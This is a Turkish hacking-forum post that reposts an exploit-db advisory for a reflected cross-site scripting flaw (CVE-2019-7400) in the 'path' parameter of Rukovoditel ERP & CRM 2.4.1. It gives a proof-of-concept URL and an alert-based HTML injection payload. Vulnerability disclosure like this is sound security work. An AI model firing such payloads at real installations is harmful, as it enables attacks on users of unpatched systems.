İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting

27-03-2019 20:43
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
653
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting
# Exploit Author/Exploit Yazarı: Javier Olmedo
# Website: https://hackpuntes.com
# Date/Tarih: 2019-03-24
# Vendor/Yapımcı: Rukovoditel
# Software Link/Yazılım Linki: https://sourceforge.net/projects/rukovoditel/
# Affected Version/Etkilenen Versiyonlar: 2.4.1 ve muhtemelen öncesi
# Patched Version/Patch Atılan Versiyonlar: version 2.4.1
# Category/Kategori: Web Application
# Platform: Windows
# Tested on/Test Edilen Sistem: Win10x64 & Kali Linux
# CVE: 2019-7400
# References/Referanslar:
https://hackpuntes.com/cve-2019-7400...ing-reflejado/

# 1. Technical Description/Teknik Açıklama:
index.php kaynağından bir GET isteği ile path parametresi, Reflected Cross-Site Scripting (XSS) ataklarına karşı savunmasızdır.



# 2. Proof Of Concept (PoC):
# http://localhost/index.php?module=it...NERABLE%22)%3E

# 3. Payload
# "><img src=a onerror=alert("VULNERABLE")>



Exploit Linki:
https://www.exploit-db.com/exploits/46608
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE

ivanwasilevic, KHAGAN Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı